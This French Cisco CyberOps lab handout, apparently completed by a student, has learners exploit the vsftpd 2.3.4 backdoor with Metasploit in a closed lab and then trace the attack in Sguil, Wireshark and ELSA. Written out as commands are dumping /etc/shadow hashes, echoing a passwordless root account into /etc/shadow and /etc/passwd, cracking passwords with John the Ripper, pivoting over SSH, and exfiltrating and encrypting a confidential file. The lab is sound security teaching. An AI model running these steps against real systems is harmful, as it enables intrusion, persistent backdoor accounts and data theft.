Vous êtes sur la page 1sur 20

Travaux pratiques – Isoler un hôte compromis en utilisant un

quintuplé
Topologie

Objectifs
Au cours de ces travaux pratiques, vous allez passer en revue les journaux documentant une faille afin de
déterminer les hôtes et le fichier compromis.
Partie 1 : Préparation de l'environnement virtuel
Partie 2 : Reconnaissance
Partie 3 : Exploitation
Partie 4 : Infiltration
Partie 5 : Examen des journaux

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 1 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

Contexte/scénario
Le quintuplé est utilisé par les administrateurs IT afin d'identifier les conditions requises pour créer un
environnement de réseau opérationnel et sécurisé. Les composants de ce quintuplé incluent une adresse IP
et un numéro de port sources, une adresse IP et un numéro de port cibles, ainsi que le protocole utilisé.
Au cours de ces travaux pratiques, vous allez exploiter un serveur vulnérable à l'aide d'exploits connus. Vous
passerez en revue les journaux afin de déterminer les hôtes et le fichier compromis.

Ressources requises
• Ordinateur hôte avec au moins 8 Go de RAM et 35 Go d'espace libre
• Dernière version d'Oracle VirtualBox
• Connexion Internet
• Quatre machines virtuelles

mémoire
Machine virtuelle vive (RAM) Espace disque Nom d'utilisateur Mot de passe

Poste de travail virtuel


CyberOps 1 Go 7 Go analyst cyberops
Kali 1 Go 10 Go Racine cyberops
Metasploitable 512 Ko 8 Go msfadmin msfadmin
Security Onion 3 GB 10 Go analyst cyberops

Partie 1 : Préparation de l'environnement virtuel


a. Lancez Oracle VirtualBox.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 2 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

b. Dans la fenêtre du poste de travail CyberOps, vérifiez que le réseau est défini sur Internal Network.
Sélectionnez Machine > Settings > Network. Sous Attached To, sélectionnez Internal Network. Dans
le menu déroulant à côté de Name, sélectionnez inside, puis cliquez sur OK.

c. Lancez les machines virtuelles CyberOps, Kali, Metasploitable et Security Onion et connectez-vous-y.
d. Sur le poste de travail virtuel CyberOps, ouvrez un terminal et configurez le réseau en exécutant le script
configure_as_static.sh.
Comme le script nécessite des privilèges de super-utilisateur, saisissez le mot de passe correspondant à
l'utilisateur analyst.
[analyst@secOps~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] password for analyst:
Configuration de la carte réseau :
IP : 192.168.0.11/24
GW : 192.168.0.1

Configuration IP réussie.
[analyst@secOps ~]$
e. Sur la machine virtuelle Security Onion, faites un clic droit sur Desktop > Open Terminal Here.
Saisissez la commande sudo service nsm status pour vérifier que tous les serveurs et les capteurs sont
prêts. Ce processus peut prendre quelques instants. Si certains services signalent un FAIL, répétez la
commande jusqu'à ce que tous les statuts indiquent OK avant de passer à la partie suivante.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 3 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

Name Type Host Status Pid Started


manager manager localhost running 5577 26 Jun 10:04:27
proxy proxy localhost running 5772 26 Jun 10:04:29
seconion-eth0-1 worker localhost running 6245 26 Jun 10:04:33
seconion-eth1-1 worker localhost running 6247 26 Jun 10:04:33
seconion-eth2-1 worker localhost running 6246 26 Jun 10:04:33
Status : seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>

Partie 2 : Reconnaissance
Dans cette partie, vous allez utiliser nmap pour déterminer si la machine virtuelle Metasploitable possède une
vulnérabilité associée à la version 2.3.4 de vsftpd.
a. Sur la machine virtuelle Security Onion, saisissez date pour afficher la date et l'heure.
analyst@SecOnion:~/Desktop$ date
Enregistrez la date et l'heure.
Thu Oct 15 15:53:56 UTC 2020
____________________________________________________________________________________
Thu Oct 15 15:53:56 UTC 2020
b. Sur la machine virtuelle Kali, effectuez un clic droit sur le Bureau, puis sélectionnez Open Terminal.
Thu Oct 15 15:53:56 UTC 2020
c. Thu
AvecOct
les15
options nmap,
15:53:56 UTCvous
2020 allez utiliser un script pour tester une vulnérabilité FTP sur la machine
virtuelle Metasploitable pour 209.165.200.235. Entrez la commande suivante :
root@kali:~# nmap --script ftp-vsftpd-backdoor 209.165.200.235 –-reason >
ftpd.txt
Les résultats peuvent être redirigés et enregistrés dans un fichier texte ftpd.txt. Ce processus peut
prendre quelques instants.
d. Lorsque l'invite s'affiche à nouveau, ouvrez le fichier de texte contenant les résultats nmap.
root@kali:~# cat ftpd.txt
Le résultat indique la vulnérabilité vsftpd et les autres ports ouverts détectés par nmap sur la machine
virtuelle Metasploitable. Au cours de ces travaux pratiques, vous allez exploiter la vulnérabilité du port 21.
Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-11 11:34 EDT
Nmap scan report for 209.165.200.235
Host is up, received echo-reply ttl 63 (0.0011s latency).
Not shown: 977 closed ports
Reason: 977 resets
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
|tate: VULNERABLE (Exploitable)
|ID : OSVDB:73573 CVE:CVE-2011-2523
|vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 4 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

|Disclosure date: 2011-07-03


|Exploit results:
|Shell command: id
|Results: uid=0(root) gid=0(root)
|References:
|http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|http://osvdb.org/73573
<output omitted>

Partie 3 : Exploitation
Maintenant que vous avez déterminé que vous pouvez obtenir un accès root à la machine virtuelle
Metasploitable, vous allez exploiter la vulnérabilité vsftp pour prendre le contrôle de la machine virtuelle
Metasploitable. Vous allez compromettre le fichier /etc/shadow pour pouvoir accéder à d'autres hôtes du
réseau.

Étape 1 : Configurez l'exploit.


Au cours de cette étape, vous allez utiliser Metasploit Framework pour lancer l'exploit contre la machine
virtuelle Metasploitable avec vsftpd. Metasploit Framework est un outil permettant de développer et de lancer
des attaques contre un hôte cible distant. Il sert également à tester la vulnérabilité d'un hôte.
a. Sur un terminal de la machine virtuelle Kali, saisissez msfconsole à l'invite pour lancer Metasploit
Framework. Ce processus peut prendre quelques instants.
root@kali:~# msfconsole
b. À l'invite msf, saisissez search vsftpd pour rechercher le module qui est associé à la porte dérobée
VSFTPD v2.3.4. Vous allez utiliser ce module pour l'exploitation. Cette recherche prend quelques instants
lorsque vous construisez la base de données pour la première fois.
msf > search vsftpd
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name Disclosure Date Rank Description


---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4
Backdoor Command Execution
c. L'exploit a été trouvé. Saisissez la commande suivante à l'invite pour utiliser l'exploit de porte dérobée
vsftp.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
d. À l'invite de l'exploit, indiquez la machine virtuelle Metasploitable comme hôte cible.
msf exploit(vsftpd_234_backdoor) > set rhost 209.165.200.235
rhost => 209.165.200.235
e. Vérifiez la configuration de l'exploit. Saisissez show options à l'invite.
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 5 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

Name Current Setting Required Description


---- --------------- -------- -----------
RHOST 209.165.200.235 yes The target address
RPORT 21 yes The target port (TCP)

Exploit target:
Id Name-- ----
0 A utomatic

Étape 2 : Exécutez l'exploit.


Vous allez maintenant utiliser l'exploit vsftpd pour obtenir l'accès root à la machine virtuelle Metaspoitable.
a. À l'invite, saisissez la commande exploit afin d'exécuter l'exploit.
msf exploit(vsftpd_234_backdoor) > exploit

[*] 209.165.200.235:21 - Banner: 220 (vsFTPd 2.3.4)


[*] 209.165.200.235:21 - USER: 331 Please specify the password.
[+] 209.165.200.235:21 - Backdoor service has been spawned, handling…
[+] 209.165.200.235:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (209.165.201.17:33985 ->
209.165.200.235:6200) at 2017-07-11 11:53:35 -0400
<No system prompt displays>
b. Cet exploit pénètre dans le terminal de Metasploit Framework et vous donne un accès root à la machine
virtuelle Metasploitable à partir de l'hôte Kali. Notez qu'aucune invite système ne s'affiche. Pour vérifier
que vous avez un accès root à la machine virtuelle Metasploitable, saisissez whoami.
whoami
root
Quel est le nom d'utilisateurs actuel ? __________________________________
c. Saisissez hostname pour vérifier le nom de l'hôte.
hostname
metasploitable
Quel est le nom d'hôte ? _______________________________________
d. L'adresse IP de la machine virtuelle Metasploit est 209.165.200.235. Saisissez ifconfig pour vérifier
l'adresse IP de l'hôte actuel.
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:15:91:86
inet addr:209.165.200.235 Bcast:209.165.200.255 Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:fe15:9186/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:78058 errors:2 dropped:0 overruns:0 frame:0
TX packets:195672 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11803523 (11.2 MB) TX bytes:91415071 (87.1 MB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 6 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

inet addr:127.0.0.1 Mask:255.0.0.0


inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1048 errors:0 dropped:0 overruns:0 frame:0
TX packets:1048 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:450261 (439.7 KB) TX bytes:450261 (439.7 KB)
e. Pour obtenir le contrôle total de la machine virtuelle Metasploitable, commencez par afficher le contenu
du fichier /etc/shadow. Le fichier /etc/shadow stocke les informations de mot de passe dans un format
chiffré pour les comptes du système, ainsi que des informations facultatives concernant leur ancienneté.
Saisissez la commande cat /etc/shadow pour afficher le contenu.
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
<some output omitted>
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
analyst:$1$uvEqE7eT$x6gczc318aD6mhxOFZqXE.:17338:0:99999:7:::
f. Mettez en surbrillance le contenu de /etc/shadow, puis effectuez un clic droit sur le contenu mis en
surbrillance et sélectionnez Copy.
g. Ouvrez un nouveau terminal sur la machine virtuelle Kali et lancez l'éditeur de texte nano. Saisissez
nano /root/shadow.txt à l'invite.
root@kali:~# nano /root/shadow.txt
h. Effectuez un clic droit sur l'espace vide dans nano et sélectionnez Paste. Après avoir collé le contenu,
supprimez toutes les lignes vides dans la partie inférieure, si nécessaire. Saisissez Ctl-X pour enregistrer
vos modifications et quitter nano. Appuyez sur y lorsque vous êtes invité à enregistrer le fichier et à
accepter le nom de fichier shadow.txt.
Cette opération enregistre le fichier /root/shadow.txt, qui sera utilisé dans une étape ultérieure avec
John the Ripper pour pirater les mots de passe de certains des identifiants afin de pouvoir accéder au
système à distance via SSH.
i. Sur le même terminal, saisissez la commande cat et grep pour afficher uniquement les informations pour
l'utilisateur root.
root@kali@~# cat /root/shadow.txt | grep root
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
Notez que le signe deux-points (:) sépare chaque ligne en 9 champs. En utilisant le compte utilisateur
racine à titre d'exemple, root est l'identifiant de connexion et $1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. est

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 7 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

le mot de passe chiffré. Les 6 champs suivants définissent les configurations du mot de passe, comme la
date de dernière modification, l'ancienneté minimale et maximale du mot de passe et sa date d'expiration.
Le dernier champ est réservé à un usage ultérieur.
Pour en savoir plus sur le fichier /etc/shadow, saisissez man shadow à l'invite d'un terminal.
j. Retournez sur le terminal Metasploit Framework sur la machine virtuelle Kali. Ajoutez un nouvel utilisateur
myroot à la machine virtuelle Metasploitable. Cet utilisateur aura les mêmes configurations de mot de
passe que l'utilisateur root.
Lorsque vous le créez, utilisez 9 champs identiques à ceux de l'utilisateur root, mais supprimez le mot de
passe chiffré associé à l'utilisateur root et laissez ce champ vide. Lorsque le champ de mot de passe est
vide, aucun mot de passe n'est nécessaire pour ouvrir une session en tant qu'utilisateur myroot.
La commande echo permet d'ajouter une ligne pour insérer le nouvel utilisateur myroot au fichier
/etc/shadow.
Remarque : assurez-vous d'utiliser deux signes « supérieur à » (>). Dans le cas contraire, vous
écraserez le fichier /etc/shadow actif.
echo "myroot::14747:0:99999:7:::" >> /etc/shadow
k. Vérifiez que vous avez ajouté le nouvel utilisateur myroot à /etc/shadow.
cat /etc/shadow
<output omitted>
myroot::14747:0:99999:7:::
Pourquoi fallait-il copier le contenu du fichier /etc/shadow dans un nouveau fichier texte sur la machine
virtuelle Kali ?
Indice : que se passerait-il si vous saisissiez cat /etc/shadow > /root/shadow.txt dans la console
Metasploit Framework ?
c'est pour obtenir le contenu de /etc/shadow au sein de la machine Kali Linux , Car si on faisait
____________________________________________________________________________________
cat /etc/shadow > /root/shadow.txt dans la console Metasploit Framework , le contenu du fichier resterait
l. Pour permettre à l'utilisateur myroot d'ouvrir une session avec des privilèges élevés, ajoutez l'utilisateur
toujours
myroot sur lale
avec machine
même ID cible metasploitable
utilisateur (UID), le même ID de groupe (GID), la même description, le même
répertoire de base et le même shell de connexion au fichier /etc/passwd que l'utilisateur root. Le signe
deux-points (:) sépare les champs tandis que le x dans le second champ représente le mot de passe de
l'utilisateur. Le mot de passe chiffré se trouve dans le fichier /etc/shadow du même utilisateur.
Retournez dans la fenêtre du terminal de connexion à distance Metasploitable, puis saisissez la
commande cat pour afficher les informations de root.
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
m. Utilisez la commande echo suivante pour ajouter les paramètres de myroot à /etc/password.
Remarque : assurez-vous de saisir deux signes « supérieur à » (>) pour éviter d'écraser le fichier
/etc/passwd actuel.
echo "myroot:x:0:0:root:/root:/bin/bash" >> /etc/passwd
Pour en savoir plus sur le fichier /etc/passwd, saisissez man 5 passwd à l'invite du terminal.
n. Vérifiez que vous avez ajouté le nouvel utilisateur myroot à /etc/passwd.
cat /etc/passwd
<output omitted>
myroot:x:0:0:root:/root:/bin/bash
Avec un accès root, l'utilisateur myroot a le contrôle total de la machine virtuelle Metasploitable.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 8 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

o. Saisissez exit une fois terminé.


exit

[*] 209.165.200.235 - Command shell session 1 closed. Reason: Died from EOFError

msf exploit(vsftpd_234_backdoor) >


p. Appuyez sur Entrée et saisissez quit pour quitter la console Metasploit Framework.

Partie 4 : Infiltration

Étape 1 : Piratez les mots de passe avec John the Ripper.


John the Ripper est un outil qui permet de craquer les mots de passe des utilisateurs lorsqu'ils sont faibles.
Au cours de cette étape, vous allez utiliser John the Ripper pour pirater des mots de passe faibles.
a. À partir de l'invite root de la machine virtuelle Kali, vérifiez que le fichier shadow se trouve dans le dossier
/root de la machine virtuelle Kali.
b. À l'invite root de la machine virtuelle Kali, saisissez la commande john pour pirater les mots de passe.
Utilisez l'option show pour afficher les mots de passe craqués.
Remarque : le mot de passe cyberops a été ajouté au fichier /usr/share/john/password.lst pour
accélérer le procédé de piratage de mot de passe.
root@kali:~# john --show /root/shadow.txt
analyst:cyberops:17338:0:99999:7:::

1 password hash cracked, 7 left


Après avoir craqué le mot de passe de l'utilisateur analyst, vous pouvez accéder à Metasploitable via
SSH avec l'identifiant de connexion analyst.

Étape 2 : Recherchez l'hôte ciblé.


Au cours de cette étape, vous allez utiliser différentes commandes pour trouver l'adresse IP d'un hôte
possible sur le réseau interne derrière la zone démilitarisée.
a. Établissez une session SSH avec la machine virtuelle Metasploitable. Saisissez yes pour accepter la
signature numérique RSA lors de la toute première connexion. La connexion peut prendre quelques
instants. Saisissez cyberops comme mot de passe lorsque vous y êtes invité.
root@kali:~# ssh analyst@209.165.200.235
analyst@209.165.200.235's password:
b. Vérifiez que vous disposez d'un accès root à Metasploitable. Saisissez su -l myroot à l'invite. Il s'agit de
la lettre L en minuscule, pas du numéro un. Notez que l'invite analyst@metasploitable a été remplacée
par root@metasploitable.
analyst@metasploitable:~$ su -l myroot
root@metasploitable:~#
c. Affichez le fichier /etc/shadow.
root@metasploitable:~# cat /etc/shadow
d. Saisissez exit à l'invite pour retourner aux privilèges d'accès de l'utilisateur analyst.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 9 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

e. Affichez le fichier /etc/shadow en tant qu'utilisateur « analyst ».


analyst@metasploitable:~$ cat /etc/shadow
Pourquoi avez-vous reçu un message d'erreur ? Enregistrez le message et expliquez.
____________________________________________________________________________________
par ce l'utilisateur analyst n'a pas les permissions d'acceder au fichier /etc/shadow
le message est > cat: /etc/shadow: Permission denied
____________________________________________________________________________________
le fichier /etc/shadow n'est accessible que par les utilisateurs possédant les droits "root"
____________________________________________________________________________________
____________________________________________________________________________________
f. Saisissez ifconfig pour répertorier toutes les interfaces réseau sur Metasploitable.
analyst@metasploitable:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:ab:84:07
inet addr:209.165.200.235 Bcast:209.165.200.255 Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:feab:8407/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1610 errors:0 dropped:0 overruns:0 frame:0
TX packets:1550 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:117030 (114.2 KB) TX bytes:123570 (120.6 KB)
Interrupt:10 Base address:0xd020
<output omitted>
g. Saisissez ip route pour déterminer la passerelle par défaut pour ce réseau.
analyst@metasploitable:~$ ip route
209.165.200.224/27 dev eth0 proto kernel scope link src 209.165.200.235
default via 209.165.200.226 dev eth0 metric 100
Quelle est la passerelle par défaut ?
la passerelle par defaut est : 209.165.200.226
____________________________________________________________________________________
h. Dans la même fenêtre de terminal, établissez une autre session SSH avec la machine virtuelle Security
Onion à l'adresse 209.165.200.226 (interface eth1) en tant qu'utilisateur analyst. Saisissez yes pour
accepter la signature numérique RSA lors de la toute première connexion. La connexion peut prendre
quelques instants. Utilisez le mot de passe cyberops lorsque vous y êtes invité.
analyst@metasploitable:~$ ssh analyst@209.165.200.226
i. Saisissez ifconfig pour afficher la liste des interfaces réseau.
analyst@SecOnion:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:c3:cd:8c
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:cd8c/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:64 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:656 (656.0 B) TX bytes:9377 (9.3 KB)
<output omitted>

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 10 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

j. Vous avez déterminé le sous-réseau du réseau local, 192.168.0.0/24. Maintenant, vous allez utiliser une
boucle for pour déterminer les hôtes actifs sur le réseau local. Pour gagner du temps, vous n'envoyez de
requête ping qu'aux 15 premiers hôtes.
analyst@SecOnion:~$ for ((i=1;i<15;i+=1)); do ping -c 2 192.168.0.$i; done
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=0.067 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=0.027 ms
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.028/0.031/0.034/0.003 ms
<output omitted>
PING 192.168.0.11 (192.168.0.11) 56(84) bytes of data.
64 bytes from 192.168.0.11: icmp_seq=1 ttl=64 time=0.606 ms
64 bytes from 192.168.0.11: icmp_seq=2 ttl=64 time=0.262 ms

--- 192.168.0.11 ping statistics ---


2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.262/0.434/0.606/0.172 ms
<output omitted>
k. Seulement 192.168.0.1 (Security Onion eth0) et 192.168.0.11 (postes de travail virtuels CyberOps)
répondent aux requêtes ping. Établissez une session SSH sur le poste de travail virtuel CyberOps.
Saisissez yes pour accepter la signature numérique RSA lors de la toute première connexion. Saisissez
cyberops comme mot de passe.
analyst@SecOnion:~$ ssh 192.168.0.11

Étape 3 : Exfiltrez le contenu d'un fichier confidentiel.


Vous avez maintenant accès au poste de travail virtuel CyberOps via une série de sessions SSH (machine
virtuelle Kali > machine virtuelle Security Onion > poste de travail virtuel CyberOps) en utilisant le mot de
passe qui a été piraté au cours d'une étape précédente. Vous allez maintenant accéder à un fichier
confidentiel et en exfiltrer le contenu.
a. Vérifiez que vous êtes dans le répertoire de base de l'utilisateur « analyst ». Changez de répertoire en
accédant à lab.support.files.
[analyst@secOps ~]$ cd lab.support.files
b. Répertoriez les fichiers qui se trouvent dans le répertoire. Vérifiez que le fichier confidential.txt se trouve
dans le dossier.
c. Établissez une session FTP avec la machine virtuelle Metasploitable. Avec l'utilisateur par défaut analyst,
saisissez cyberops comme mot de passe.
[analyst@secOps lab.support.files]$ ftp 209.165.200.235
Connected to 209.165.200.235.
220 (vsFTPd 2.3.4)
Name (209.165.200.235:analyst): analyst
331 Please specify the password.
Mot de passe :
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 11 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

d. Importez le fichier confidential.txt dans la machine virtuelle Metasplolitable. Maintenant, vous avez
accès au fichier et vous pouvez le transférer vers la machine virtuelle Kali, le cas échéant.
ftp> put confidential.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
103 bytes sent in 0.000104 seconds (41.6 kbytes/s)
e. Saisissez quit lorsque vous avez fini de transférer le fichier.

Étape 4 : Chiffrez les données et supprimez l'original.


a. Souvent, les hackers chiffrent les données confidentielles et les stockent localement, dans le but éventuel
de demander une rançon ultérieurement. Compressez le fichier confidential.txt au format ZIP et chiffrez-
le. Saisissez cyberops comme mot de passe.
analyst@secOps lab.support.files]$ zip -e confidential.zip confidential.txt
Saisir le mot de passe :
Vérifier le mot de passe :
adding: confidential.txt (deflated 4%)
b. Supprimez le fichier confidential.txt du poste de travail virtuel CyberOps.
[analyst@secOps lab.support.files]$ rm confidential.txt
c. Saisissez exit trois fois jusqu'à ce que vous retourniez à l'invite root@kali:~#.
d. Maintenant, le hacker copie le fichier depuis le FTP sur la machine virtuelle Metasploitable vers la
machine virtuelle Kali. Ce processus peut prendre quelques instants. Saisissez le mot de passe
cyberops lorsque vous y êtes invité.
root@kali:~# scp analyst@209.165.200.235:/home/analyst/confidential.txt ~
analyst@209.165.200.235's password:
confidential.txt 100% 102 102.1KB/s 00:00
Remarque : vous pouvez copier directement le fichier à partir du poste de travail virtuel CyberOps vers la
machine virtuelle Kali s'il existe un compte utilisateur autre que l'utilisateur root configuré sur la machine
virtuelle Kali. Comme FTP transmet le contenu en texte brut, vous pouvez afficher le contenu dans des
paquets en utilisant Wireshark.
e. Si vous le souhaitez, vous pouvez ouvrir une session dans Metasploitable et supprimer le fichier
confidential.txt du serveur FTP.
root@kali:~# ssh analyst@209.165.200.235
analyst@209.165.200.235's password:
analyst@metasploitable:~$ rm confidential.txt
f. À ce moment, vous pouvez arrêter le poste de travail virtuel CyberOps, ainsi que les machines virtuelles
Metasploitable et Kali.

Partie 5 : Examiner les fichiers journaux


Après l'attaque, l'utilisateur « analyst » n'a plus accès au fichier confidential.txt. Vous allez maintenant
passer en revue les journaux pour déterminer comment le fichier a été compromis.
Remarque : s'il s'agit d'un réseau de production, il est souhaitable que les utilisateurs analyst et root
changent leur mot de passe conformément à la politique de sécurité actuelle.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 12 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

Étape 1 : Examinez les alertes dans Squil.


a. Accédez à la machine virtuelle Security Onion. Connectez-vous avec l'utilisateur analyst et le mot de
passe cyberops.
b. Ouvrez Sguil et connectez-vous. Cliquez sur Select All, puis sur Start SGUIL.
c. Passez en revue les événements répertoriés dans la colonne Event Message. Deux des messages sont
GPL ATTACK_RESPONSE id check returned root. Ce message indique qu'un hacker a pu obtenir un
accès root. L'hôte à l'adresse 209.165.200.235 a renvoyé un accès root à 209.165.201.17. Cochez les
cases Show Packet Data et Show Rule pour afficher chaque alerte plus en détail.

d. Sélectionnez le message root renvoyé qui est associé à Senor seconion-eth1-1 pour une analyse
ultérieure. Dans la figure ci-dessous, Alert ID 5.2568 et ses événements corrélés sont utilisés. Toutefois,
il est très probable que la valeur Alert ID soit différente.

e. Faites un clic droit sur ce nombre sous l'en-tête CNT et sélectionnez View Correlated Events.

f. Dans le nouvel onglet, faites un clic droit sur Alert ID à la recherche de l'une des alertes GPL
ATTACK_RESPONSE id check returned root, puis sélectionnez Transcript. L'ID d'alerte 5.2570 est
utilisé dans cet exemple.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 13 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

g. Examinez les transcriptions de toutes les alertes. La dernière alerte de l'onglet est susceptible d'afficher
les transactions entre les machines virtuelles Kali (à l'origine de l'attaque) et Metasploitable (cible) lors de
l'attaque.

Que s'est-il passé pendant l'attaque ?


____________________________________________________________________________________
pendant l'attaque l'attaquant a obtenue un accès root sur la machine metasploitable et a créé un nouvel
untilisateur myroot sans mot de passe et avec les privilège root
____________________________________________________________________________________
____________________________________________________________________________________

Étape 2 : Passez à Wireshark.


a. Sélectionnez l'alerte qui vous a fourni la transcription de l'étape précédente. Cliquez avec le bouton droit
sur l'ID d'alerte, puis sélectionnez Wireshark. La fenêtre principale de Wireshark affiche 3 vues d'un
paquet.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 14 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

b. Pour afficher tous les paquets assemblés dans une conversation TCP, cliquez avec le bouton droit sur
n'importe quel paquet, puis sélectionnez Follow TCP Stream.

Qu'avez-vous observé ? Qu'indiquent les couleurs de texte rouge et bleu ?


____________________________________________________________________________________
on observe que la fenetre follow tcp stream repertori toutes les transactions qui ont eu lieu entre kali linu et
metasploitable
____________________________________________________________________________________
les textes en rouge indiquent les requetes provenant de l'attaquant et les bleus indiquent les reponses
c. Quittez la fenêtre du flux TCP. Lorsque vous avez terminé d'examiner les informations fournies par
provenant
Wireshark,defermez-le.
metasploitable

Étape 3 : Utilisez ELSA pour passer aux journaux Bro.


a. Retournez dans Sguil. Effectuez un clic droit sur l'IP source ou de destination de la même alerte GPL
ATTACK_RESPONSE id check returned root et sélectionnez ELSA IP Lookup > DstIP. Saisissez le
nom d'utilisateur analyst et le mot de passe cyberops lorsque vous y êtes invité par ELSA.
Remarque : si vous avez reçu le message « Your connection is not private », cliquez sur ADVANCED >
Proceed to localhost (unsafe) pour continuer.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 15 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

b. Cliquez sur bro_notice.

c. Le résultat indique que 209.165.201.17 effectuait une analyse des ports sur 209.165.200.235, la machine
virtuelle Metasploitable. Le hacker a probablement trouvé des vulnérabilités sur la machine virtuelle
Metasploitable afin d'y obtenir l'accès.

d. Si un hacker a compromis Metasploitable, il est important de déterminer l'exploit qui a été utilisé et les
contenus auxquels il a accédé.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 16 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé

